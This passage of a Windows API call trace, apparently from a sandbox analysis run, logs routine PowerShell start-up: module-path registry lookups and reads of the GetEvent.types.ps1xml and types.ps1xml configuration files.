lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.194] GetLastError () returned 0x3 [0043.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.194] GetLastError () returned 0x3 [0043.194] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.195] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.195] GetLastError () returned 0x3 [0043.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.196] GetLastError () returned 0x3 [0043.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25dfa0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.196] GetLastError () returned 0x3 [0043.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.196] GetLastError () returned 0x3 [0043.196] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x25df50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0043.196] GetLastError () returned 0x3 [0043.200] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x54e2a0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33 [0043.200] GetLastError () returned 0x3 [0043.203] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54e2a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0043.203] GetLastError () returned 0x3 [0043.203] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e560 | out: phkResult=0x25e560*=0x33c) returned 0x0 [0043.204] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e5a4, lpData=0x0, lpcbData=0x25e5a0*=0x0 | out: lpType=0x25e5a4*=0x2, lpData=0x0, lpcbData=0x25e5a0*=0x6c) returned 0x0 [0043.205] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e5a4, lpData=0x54e2a0, lpcbData=0x25e5a0*=0x6c | out: lpType=0x25e5a4*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x25e5a0*=0x6c) returned 0x0 [0043.205] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x54e2a0, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb [0043.205] GetLastError () returned 0x3 [0043.205] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54e2a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0043.205] GetLastError () returned 0x3 [0043.206] RegCloseKey (hKey=0x33c) returned 0x0 [0043.206] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x54e2a0, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34 [0043.206] GetLastError () returned 0x3 [0043.207] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e560 | out: phkResult=0x25e560*=0x33c) returned 0x0 [0043.207] RegQueryValueExW (in: hKey=0x33c, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x25e5a4, lpData=0x0, lpcbData=0x25e5a0*=0x0 | out: lpType=0x25e5a4*=0x0, lpData=0x0, lpcbData=0x25e5a0*=0x0) returned 0x2 [0043.207] RegCloseKey (hKey=0x33c) returned 0x0 [0043.248] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x54e2a0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0 [0043.249] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x25e0c8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27 [0043.249] GetLastError () returned 0x3f0 [0043.250] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1 [0043.251] GetLastError () returned 0x3f0 [0043.283] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e4e0 | out: phkResult=0x25e4e0*=0x344) returned 0x0 [0043.287] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e548, lpData=0x0, lpcbData=0x25e544*=0x0 | out: lpType=0x25e548*=0x1, lpData=0x0, lpcbData=0x25e544*=0x74) returned 0x0 [0043.287] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e528, lpData=0x0, lpcbData=0x25e524*=0x0 | out: lpType=0x25e528*=0x1, lpData=0x0, lpcbData=0x25e524*=0x74) returned 0x0 [0043.287] RegQueryValueExW (in: hKey=0x344, lpValueName="path", lpReserved=0x0, lpType=0x25e528, lpData=0x54e2a0, lpcbData=0x25e524*=0x74 | out: lpType=0x25e528*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x25e524*=0x74) returned 0x0 [0043.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x25e0a8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0043.288] GetLastError () returned 0xcb [0043.288] SetErrorMode (uMode=0x1) returned 0x1 [0043.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x25e528 | out: lpFileInformation=0x25e528*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x800df312, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1e4bcac7, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1e4bcac7, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0043.288] GetLastError () returned 0xcb [0043.288] SetErrorMode (uMode=0x1) returned 0x1 [0043.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.288] GetLastError () returned 0xcb [0043.288] SetErrorMode (uMode=0x1) returned 0x1 [0043.288] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e51c | out: lpFileInformation=0x25e51c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0043.289] GetLastError () returned 0xcb [0043.289] SetErrorMode (uMode=0x1) returned 0x1 [0043.289] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25e09c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.289] GetLastError () returned 0xcb [0043.289] SetErrorMode (uMode=0x1) returned 0x1 [0043.289] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x25e51c | out: lpFileInformation=0x25e51c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd7c2d31c, ftCreationTime.dwHighDateTime=0x1c9ea11, ftLastAccessTime.dwLowDateTime=0xd7c2d31c, ftLastAccessTime.dwHighDateTime=0x1c9ea11, ftLastWriteTime.dwLowDateTime=0xd7c5347c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x291b4)) returned 1 [0043.290] GetLastError () returned 0xcb [0043.290] SetErrorMode (uMode=0x1) returned 0x1 [0043.291] GetACP () returned 0x4e4 [0043.329] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.329] GetLastError () returned 0x0 [0043.329] SetErrorMode (uMode=0x1) returned 0x1 [0043.333] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0043.333] GetLastError () returned 0x0 [0043.335] GetFileType (hFile=0x348) returned 0x1 [0043.335] SetErrorMode (uMode=0x1) returned 0x1 [0043.336] GetFileType (hFile=0x348) returned 0x1 [0043.340] ReadFile (in: hFile=0x348, lpBuffer=0x2c50288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c50288*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.350] GetLastError () returned 0x0 [0043.352] ReadFile (in: hFile=0x348, lpBuffer=0x2c50288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c50288*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.352] GetLastError () returned 0x0 [0043.352] ReadFile (in: hFile=0x348, lpBuffer=0x2c50288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c50288*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.353] GetLastError () returned 0x0 [0043.354] ReadFile (in: hFile=0x348, lpBuffer=0x2c50288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c50288*, lpNumberOfBytesRead=0x25e494*=0xcf3, lpOverlapped=0x0) returned 1 [0043.354] GetLastError () returned 0x0 [0043.354] ReadFile (in: hFile=0x348, lpBuffer=0x2c4f71b, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c4f71b*, lpNumberOfBytesRead=0x25e494*=0x0, lpOverlapped=0x0) returned 1 [0043.354] GetLastError () returned 0x0 [0043.354] ReadFile (in: hFile=0x348, lpBuffer=0x2c50288, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c50288*, lpNumberOfBytesRead=0x25e494*=0x0, lpOverlapped=0x0) returned 1 [0043.355] GetLastError () returned 0x0 [0043.355] CloseHandle (hObject=0x348) returned 1 [0043.356] GetLastError () returned 0x0 [0043.357] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dff4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.357] GetLastError () returned 0x0 [0043.357] SetErrorMode (uMode=0x1) returned 0x1 [0043.357] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2c615fc | out: lpFileInformation=0x2c615fc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a0058e2, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a0058e2, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd7bbaefc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1 [0043.358] GetLastError () returned 0x0 [0043.358] SetErrorMode (uMode=0x1) returned 0x1 [0043.368] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.368] GetLastError () returned 0x0 [0043.368] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x25e418 | out: phkResult=0x25e418*=0x348) returned 0x0 [0043.369] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e460, lpData=0x0, lpcbData=0x25e45c*=0x0 | out: lpType=0x25e460*=0x1, lpData=0x0, lpcbData=0x25e45c*=0x56) returned 0x0 [0043.369] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x25e460, lpData=0x54e2a0, lpcbData=0x25e45c*=0x56 | out: lpType=0x25e460*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0x25e45c*=0x56) returned 0x0 [0043.370] RegCloseKey (hKey=0x348) returned 0x0 [0043.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25dfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.370] GetLastError () returned 0x0 [0043.370] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40 [0043.370] GetLastError () returned 0x0 [0043.475] GetSystemInfo (in: lpSystemInfo=0x25db98 | out: lpSystemInfo=0x25db98*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x1, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0043.475] VirtualQuery (in: lpAddress=0x25d354, lpBuffer=0x25e354, dwLength=0x1c | out: lpBuffer=0x25e354*(BaseAddress=0x25d000, AllocationBase=0x220000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0043.493] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", nBufferLength=0x105, lpBuffer=0x25df2c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml", lpFilePart=0x0) returned 0x37 [0043.493] GetLastError () returned 0x0 [0043.493] SetErrorMode (uMode=0x1) returned 0x1 [0043.493] CreateFileW (lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\types.ps1xml" (normalized: "c:\\windows\\syswow64\\windowspowershell\\v1.0\\types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x348 [0043.493] GetLastError () returned 0x0 [0043.493] GetFileType (hFile=0x348) returned 0x1 [0043.493] SetErrorMode (uMode=0x1) returned 0x1 [0043.493] GetFileType (hFile=0x348) returned 0x1 [0043.493] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.494] GetLastError () returned 0x0 [0043.494] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.501] GetLastError () returned 0x0 [0043.501] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.501] GetLastError () returned 0x0 [0043.502] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.502] GetLastError () returned 0x0 [0043.502] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.502] GetLastError () returned 0x0 [0043.502] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.502] GetLastError () returned 0x0 [0043.502] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.502] GetLastError () returned 0x0 [0043.503] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.503] GetLastError () returned 0x0 [0043.503] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.503] GetLastError () returned 0x0 [0043.503] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.503] GetLastError () returned 0x0 [0043.503] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.504] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.504] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.506] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.506] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.506] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.506] GetLastError () returned 0x0 [0043.506] ReadFile (in: hFile=0x348, lpBuffer=0x2c95a18, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x25e494, lpOverlapped=0x0 | out: lpBuffer=0x2c95a18*, lpNumberOfBytesRead=0x25e494*=0x1000, lpOverlapped=0x0) returned 1 [0043.506] GetLastError () returned 0x0 [0043.507] ReadFile (in: hFile=0x348, 